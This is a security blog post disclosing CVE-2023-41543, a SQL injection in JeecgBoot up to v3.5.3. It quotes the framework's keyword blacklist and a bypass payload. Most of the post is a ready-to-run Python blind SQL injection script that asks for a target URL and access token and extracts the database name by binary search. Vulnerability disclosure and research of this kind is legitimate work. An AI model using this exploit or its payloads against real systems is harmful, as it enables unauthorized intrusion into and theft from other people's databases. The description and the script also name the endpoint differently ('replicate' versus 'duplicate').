CVE-2023-41543(JeecgBoot Sql Injection)

Description

JEECG Boot v3.5.3 was discovered to contain a SQL injection in /sys/replicate/check

Affected version

JeecgBoot <= v3.5.3

Vulnerability Analysis

It was found that the framework has protected the original SQL injection by adding a blacklist. The blacklist is as follows:

“exec|peformance_schema|information_schema|extractvalue|updatexml|geohash|gtid_subset|gtid_subtract| insert | alter | delete | grant | update | drop | chr | mid | master | truncate | char | declare |user()|”;

Therefore, it is possible to directly construct payloads outside of the blacklist to bypass existing protective measures,As I mentioned in the report

1
1 'having {ascii}=(nullif (ascii (substring ((select database()), {place}, 1)), 0) or'

Exp

The complete utilization script is as follows

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import requests
import json

def get_database(url,token):
url=url+"/jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldVal=1&dataId=asd&fieldName="
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Referer': 'http://localhost:8088/jeecg-boot/jmreport/list',
'X-Access-Token': 'null',
'token': 'null',
'JmReport-Tenant-Id': 'null',
'Content-Type': 'application/json',
'Connection': 'close',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Site': 'same-origin',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
headers["X_ACCESS_TOKEN"]=token
length=1
while True:
payload=f"1 having 32<(nullif(ascii((substring((select database()),{length},1))),0)) "
response=requests.get(url+payload,headers=headers)
res=json.loads(response.text)
if res["code"]!="200":
break
else:
length+=1
database=""
for place in range(1,length):
min=32
max=128
mid=(min+max)//2
while min<max:
payload=f"1 having {mid}<(nullif(ascii((substring((select database()),{place},1))),0)) "
response=requests.get(url+payload,headers=headers)
res=json.loads(response.text)
if res["code"]=="200":
min = mid + 1
else:
max = mid
mid = (min + max) // 2
database+=chr(mid)
print(database)
# get_database("http://localhost:8088","")
url=input("please input your target: (example:http://localhost:8088)")
token=input("please input your X_ACCESS_TOKEN: ")
get_database(url,token)

CVE-2023-41543(JeecgBoot Sql Injection)
https://pho3n1x-web.github.io/2023/09/18/CVE-2023-41543(JeecgBoot_sql)/
Author
Pho3n1x
Posted on
September 18, 2023
Licensed under